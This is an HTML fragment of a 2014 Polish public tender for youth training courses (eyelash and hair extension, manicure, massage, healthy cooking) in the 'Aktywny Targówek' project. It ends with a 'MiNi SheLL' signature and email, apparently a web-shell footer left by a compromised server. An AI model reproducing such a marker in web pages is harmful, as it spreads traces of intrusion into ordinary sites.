6.	Wykonawca zapewni dla uczestników kursu wodę mineralną, soki oraz ciasteczka a także naczynia do ich dystrybucji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> kurs przedłużania i zagęszczania rzęs.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Celem Kursu przedłużania rzęs jest przygotowanie  uczestnika do hobbystycznego wykonywania  zabiegu przedłużania rzęs metodą 1:1. Kurs przeznaczony ma być dla osób bez doświadczenia;
2.	Uczestnikami kursu będzie 9  osób;
3.	Czas trwania kursu:  8  godzin lekcyjnych  w sobotę lub niedzielę;
4.	Wykonawca zapewni odpowiednio wyposażoną salę do zajęć oraz wszystkie pomoce i materiały niezbędne do przeprowadzenia szkolenia;
5.	Program  kursu musi zawierać:
-	zachęcenie młodzieży do dbałości o wygląd i estetykę oprawy oczu
-	omówienie sposobów przedłużania rzęs
-	pokaz: przygotowanie stanowiska pracy
-	omówienie i pokaz zasad pielęgnacji przedłużonych rzęs
-	nauka dobrania odpowiedniej długość rzęs
-	technika usuwania rzęs - nauka praktyczna
-	zabieg przedłużania rzęs - nauka praktyczna.
6.	Wykonawca zapewni dla uczestników serwis kawowy (kawa, herbata, ciasteczka) oraz 1 posiłek obiadowy dziennie;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> kurs przedłużania włosów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Celem kursu jest  zdobycie niezbędnej wiedzy teoretycznej i praktycznej na temat przedłużania i zagęszczania włosów jedną z wybranych technik, omówienie stanowiska pracy, produktów i akcesoriów i przygotowanie klientki do zabiegu;
2.	Uczestnikami kursu będzie 11 osób - młodzież (dziewczęta) uczestnicząca w projekcie Aktywny Targówek (w większości ucząca się w szkole średniej na kierunku fryzjerstwo);
3.	Zajęcia  obejmą 8 godzin dydaktycznych zajęć  i odbędą się w systemie weekendowym (np. sobota lub niedziela). Zajęcia praktyczne muszą stanowić co najmniej 80% zajęć;
4.	Wykonawca,  poza wymaganiami określonymi w części ogólnej Opisu przedmiotu zamówienia, w cenie i programie  warsztatów  musi uwzględnić:
-	zachęcenie młodzieży do dbałości o wygląd i estetykę włosów;
-	praktyczną naukę przedłużania i zagęszczania ćwiczeń;
-	produkty i akcesoria do praktycznych ćwiczeń;
5.	Wykonawca zapewni odpowiednio wyposażoną salę do zajęć oraz wszystkie pomoce i materiały niezbędne do przeprowadzenia szkolenia;
6.	Wykonawca zapewni dla uczestników serwis kawowy (kawa, herbata, ciasteczka) oraz 1 posiłek obiadowy dziennie;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> kurs manicure i pedicure.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Celem kursu jest  zdobycie niezbędnej wiedzy teoretycznej i praktycznej niezbędnej do dbałości o higienę, zdrowie i estetykę dłoni i stóp oraz praktyczne zapoznanie uczestników z trendami w stylizacji paznokci (np. manicure hybrydowy, żel lub akryl itd.) u rąk i nóg;
2.	Uczestnikami kursu będzie 10 osób - młodzież (dziewczęta) uczestnicząca w projekcie Aktywny Targówek;
3.	Zajęcia  obejmą 16 godzin dydaktycznych zajęć  i odbędą się w systemie weekendowym (np. sobota i niedziela po 8 godzin dydaktycznych każdego dnia). Zajęcia praktyczne muszą stanowić co najmniej 14 godzin;
4.	Wykonawca,  poza wymaganiami określonymi w części ogólnej Opisu przedmiotu zamówienia, w cenie i programie  warsztatów  musi uwzględnić:
zachęcenie młodzieży do dbałości o wygląd i estetykę dłoni;
5.	Wykonawca zapewni odpowiednio wyposażoną salę do zajęć oraz wszystkie pomoce i materiały niezbędne do przeprowadzenia szkolenia;
6.	Wykonawca zapewni dla uczestników serwis kawowy (kawa, herbata, ciasteczka) oraz 1 posiłek obiadowy dziennie;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> kurs masażu dla amatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Celem kursu jest nauka bezpiecznego i profesjonalnego wykonywania masażu pleców, kończyn dolnych oraz masażu karku oraz poznanie niezbędnych elementów anatomii układu ruchowego. Zdobyte wiadomości teoretyczne i umiejętności praktyczne powinny pozwolić na wykonanie skutecznego zabiegu, który usunie nadmierne napięcie mięśni i zrelaksuje masowanego;
2.	Uczestnikami kursu będzie 10 osób - młodzież uczestnicząca w projekcie Aktywny Targówek;
3.	Zajęcia obejmą 6 godzin dydaktycznych zajęć i odbędą się w systemie weekendowym (sobota lub niedziela);
4.	Wykonawca zapewni odpowiednio wyposażoną salę do zajęć oraz wszystkie pomoce i materiały niezbędne do przeprowadzenia kursu;
5.	Wykonawca zapewni dla uczestników serwis kawowy (kawa, herbata, ciasteczka) oraz 1 posiłek obiadowy dla każdego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> warsztat zdrowego żywienia z dietetyką.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu szkolenia w formie warsztatów o tematyce: zdrowe żywienie z dietetyką dla 5 osób młodzieży uczestniczącej w projekcie Aktywny Targówek w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego;
2.	Celem warsztatów jest nabycie przez osoby biorące udział w warsztacie praktycznych umiejętności planowania i przygotowywania posiłków, które będą odpowiadały zasadom zbilansowanej diety i zdrowego, pełnowartościowego i dietetycznego żywienia;
3.	Czas trwania warsztatów - 8 godzin lekcyjnych (2 * 4 godziny popołudniami lub jedna sobota lub niedziela - w zależności od ustaleń z Zamawiającym);
4.	Program warsztatów powinien zawierać minimum:
-	planowanie zdrowego jadłospisu 
-	planowanie diety i odchudzanie
-	praktyczna nauka gotowania 
-	praktyczne warsztaty gotowania 
5.	Po stronie Wykonawcy leży:
-	Zapewnienie sali wyposażonej w odpowiednią ilość stanowisk oraz niezbędny sprzęt;
-	produkty do przyrządzania potraw w ramach zajęć praktycznych;
-	degustację przyrządzonych potraw oraz zapewnienie napojów: woda mineralna, soki;
-	zapewnienie zabezpieczenia ubrań uczestników np.  fartuchy, zapaski, itp.;
-	materiał w postaci wydrukowanych przepisów  kulinarnych dla każdego uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com